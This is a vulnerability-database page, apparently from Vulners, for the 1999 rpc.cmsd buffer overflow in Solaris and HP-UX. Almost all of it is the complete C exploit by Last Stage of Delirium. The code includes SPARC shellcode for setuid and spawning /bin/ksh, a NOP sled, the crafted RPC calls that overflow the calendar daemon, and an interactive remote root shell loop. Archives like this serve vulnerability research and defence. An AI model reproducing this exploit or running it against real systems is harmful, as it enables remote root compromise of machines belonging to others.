Vulners
Lucene search
Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (1)
source: http://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*## copyright LAST STAGE OF DELIRIUM jul 1999 poland *://lsd-pl.net/ #*/
/*## rpc.cmsd #*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 1500
#define NOPNUM 1600
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PING 0
#define CMSD_CREATE 21
#define CMSD_INSERT 6
char findsckcode[]=
"\x20\xbf\xff\xff" /* bn,a <findsckcode-4> */
"\x20\xbf\xff\xff" /* bn,a <findsckcode> */
"\x7f\xff\xff\xff" /* call <findsckcode+4> */
"\xa0\x20\x3f\xff" /* sub %g0,-1,%l0 */
"\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */
"\xa6\x10\x20\x44" /* mov 0x44,%l3 */
"\xa8\x10\x23\xff" /* mov 0x3ff,%l4 */
"\xaa\x03\xe0\x44" /* add %o7,68,%l5 */
"\x81\xc5\x60\x08" /* jmp %l5+8 */
"\xaa\x10\x20\xff" /* mov 0xff,%l5 */
"\xab\x2d\x60\x08" /* sll %l5,8,%l5 */
"\xaa\x15\x60\xff" /* or %l5,0xff,%l5 */
"\xe2\x03\xff\xd0" /* ld [%o7-48],%l1 */
"\xac\x0c\x40\x15" /* and %l1,%l5,%l6 */
"\x2b\x00\x00\x00" /* sethi %hi(0x00000000),%l5 */
"\xaa\x15\x60\x00" /* or %l5,0x000,%l5 */
"\xac\x05\x40\x16" /* add %l5,%l6,%l6 */
"\xac\x05\xbf\xff" /* add %l6,-1,%l6 */
"\x80\xa5\xbf\xff" /* cmp %l6,-1 */
"\x02\xbf\xff\xf5" /* be <findsckcode+32> */
"\xaa\x03\xe0\x7c" /* add %o7,0x7c,%l5 */
"\xe6\x23\xff\xc4" /* st %l3,[%o7-60] */
"\xc0\x23\xff\xc8" /* st %g0,[%o7-56] */
"\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */
"\x90\x04\x3f\xff" /* add %l0,-1,%o0 */
"\xaa\x10\x20\x54" /* mov 0x54,%l5 */
"\xad\x2d\x60\x08" /* sll %l5,8,%l6 */
"\x92\x15\xa0\x91" /* or %l6,0x91,%o1 */
"\x94\x03\xff\xc4" /* add %o7,-60,%o2 */
"\x82\x10\x20\x36" /* mov 0x36,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\xa0\x24\x3f\xff" /* sub %l0,-1,%l0 */
"\x1a\xbf\xff\xe9" /* bcc <findsckcode+36> */
"\x80\xa4\x23\xff" /* cmp %l0,0x3ff */
"\x04\xbf\xff\xf3" /* bl <findsckcode+84> */
"\xaa\x20\x3f\xff" /* sub %g0,-1,%l5 */
"\x90\x05\x7f\xff" /* add %l5,-1,%o0 */
"\x82\x10\x20\x06" /* mov 0x6,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x90\x04\x3f\xfe" /* add %l0,-2,%o0 */
"\x82\x10\x20\x29" /* mov 0x29,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\xaa\x25\x7f\xff" /* sub %l5,-1,%l5 */
"\x80\xa5\x60\x03" /* cmp %l5,3 */
"\x04\xbf\xff\xf8" /* ble <findsckcode+144> */
"\x80\x1c\x40\x11" /* xor %l1,%l1,%g0 */
;
char setuidcode[]=
"\x90\x08\x3f\xff" /* and %g0,-1,%o0 */
"\x82\x10\x20\x17" /* mov 0x17,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
;
char shellcode[]=
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x24" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\x98\x03\xe0\x24" /* add %o7,32,%o4 */
"\xc0\x23\x20\x08" /* st %g0,[%o4+8] */
"\xd0\x23\x20\x10" /* st %o0,[%o4+16] */
"\xc0\x23\x20\x14" /* st %g0,[%o4+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
char cmdshellcode[]=
"\x20\xbf\xff\xff" /* bn,a <cmdshellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <cmdshellcode> */
"\x7f\xff\xff\xff" /* call <cmdshellcode+4> */
"\x90\x03\xe0\x34" /* add %o7,52,%o0 */
"\x92\x23\xe0\x20" /* sub %o7,32,%o1 */
"\xa2\x02\x20\x0c" /* add %o0,12,%l1 */
"\xa4\x02\x20\x10" /* add %o0,16,%l2 */
"\xc0\x2a\x20\x08" /* stb %g0,[%o0+8] */
"\xc0\x2a\x20\x0e" /* stb %g0,[%o0+14] */
"\xd0\x23\xff\xe0" /* st %o0,[%o7-32] */
"\xe2\x23\xff\xe4" /* st %l1,[%o7-28] */
"\xe4\x23\xff\xe8" /* st %l2,[%o7-24] */
"\xc0\x23\xff\xec" /* st %g0,[%o7-20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh -c "
;
static char nop[]="\x80\x1c\x40\x11";
typedef struct{char *target,*new_target;}req1_t;
typedef struct{
struct{long tick,key;}appt_id;
void *tag;
int duration,ntimes;
char *what;
struct{int period,nth;long enddate;}period;
char *author,*client_data;
void *exception,*attr;
int appt_status,privacy;
void *next;
}appt_t;
typedef struct{
char *target;
struct{
int tag;
union{struct{void *v1,*v2;int i;}apptid;appt_t *appt;}args_u;
}args;
int pid;
}req2_t;
bool_t xdr_req1(XDR *xdrs,req1_t *obj){
if(!xdr_string(xdrs,&obj->target,~0)) return(FALSE);
if(!xdr_string(xdrs,&obj->new_target,~0)) return(FALSE);
}
bool_t xdr_appt(XDR *xdrs,appt_t *objp){
char *v=NULL;long l=0;int i=0;
if(!xdr_long(xdrs,&l)) return(FALSE);
if(!xdr_long(xdrs,&l)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
if(!xdr_int(xdrs,&i)) return(FALSE);
if(!xdr_int(xdrs,&objp->ntimes)) return(FALSE);
if(!xdr_string(xdrs,&objp->what,~0)) return(FALSE);
if(!xdr_int(xdrs,&objp->period.period)) return(FALSE);
if(!xdr_int(xdrs,&i)) return(FALSE);
if(!xdr_long(xdrs,&l)) return(FALSE);
if(!xdr_string(xdrs,&objp->author,~0)) return(FALSE);
if(!xdr_string(xdrs,&objp->client_data,~0)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
if(!xdr_int(xdrs,&i)) return(FALSE);
if(!xdr_int(xdrs,&i)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
return(TRUE);
}
bool_t xdr_req2(XDR *xdrs,req2_t *obj){
if(!xdr_string(xdrs,&obj->target,~0)) return(FALSE);
if(!xdr_int(xdrs,&obj->args.tag)) return(FALSE);
if(!xdr_pointer(xdrs,(char**)&obj->args.args_u.appt,sizeof(appt_t),
xdr_appt)) return(FALSE);
if(!xdr_int(xdrs,&obj->pid)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[30000],address[4],*b,*cmd;
int i,c,n,flag=0,vers=7,port=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req1_t req1;req2_t req2;appt_t ap;
char calendar[32];
printf("copyright LAST STAGE OF DELIRIUM jul 1999 poland //lsd-pl.net/\n");
printf("rpc.cmsd for solaris 2.5 2.5.1 2.6 2.7 sparc\n\n");
if(argc<2){
printf("usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]\n",
argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"tsc:p:v:"))!=-1){
switch(c){
case 't': flag|=4;break;
case 's': flag|=2;break;
case 'c': flag|=1;cmd=optarg;break;
case 'p': port=atoi(optarg);break;
case 'v': vers=atoi(optarg);
}
}
if(vers==5) *(unsigned long*)address=htonl(0xefffcf48+600);
if(vers==6) *(unsigned long*)address=htonl(0xefffed0c+100);
if(vers==7) *(unsigned long*)address=htonl(0xffbeea8c+600);
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("\nerror");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}else{
if((hp=gethostbyaddr((char*)&adr.sin_addr.s_addr,4,AF_INET))==NULL){
errno=EADDRNOTAVAIL;perror("\nerror");exit(-1);
}
}
if((b=(char*)strchr(hp->h_name,'.'))!=NULL) *b=0;
if(flag&4){
sck=RPC_ANYSOCK;
if(!(cl=clntudp_create(&adr,CMSD_PROG,CMSD_VERS,tm,&sck))){
clnt_pcreateerror("\nerror");exit(-1);
}
stat=clnt_call(cl,CMSD_PING,xdr_void,NULL,xdr_void,NULL,tm);
if(stat!=RPC_SUCCESS) {clnt_perror(cl,"\nerror");exit(-1);}
clnt_destroy(cl);
if(flag==4) {printf("sent!\n");exit(0);}
}
adr.sin_port=htons(port);
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,CMSD_PROG,CMSD_VERS,&sck,0,0))){
clnt_pcreateerror("\nerror");exit(-1);
}
cl->cl_auth=authunix_create(hp->h_name,0,0,0,NULL);
sprintf(calendar,"xxx.XXXXXX");
req1.target=mktemp(calendar);
req1.new_target="";
stat=clnt_call(cl,CMSD_CREATE,xdr_req1,&req1,xdr_void,NULL,tm);
if(stat!=RPC_SUCCESS) {clnt_perror(cl,"\nerror");exit(-1);}
b=buffer;
for(i=0;i<ADRNUM;i++) *b++=address[i%4];
*b=0;
b=&buffer[2000];
for(i=0;i<2;i++) *b++=0xff;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
if(flag&2){
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=-ntohs(adr.sin_port);
printf("port=%d connected! ",-n);fflush(stdout);
*((unsigned long*)(&findsckcode[56]))|=htonl((n>>10)&0x3fffff);
*((unsigned long*)(&findsckcode[60]))|=htonl(n&0x3ff);
for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
}else{
for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
*b++=';';
for(i=0;i<3+4-((strlen(cmd)%4));i++) *b++=0xff;
}
*b=0;
ap.client_data=buffer;
ap.what=&buffer[2000];
ap.author="";
ap.ntimes=1;
ap.period.period=1;
req2.target=calendar;
req2.args.tag=3;
req2.args.args_u.appt=≈
stat=clnt_call(cl,CMSD_INSERT,xdr_req2,&req2,xdr_void,NULL,tm);
if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
printf("sent!\n");if(flag&1) exit(0);
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1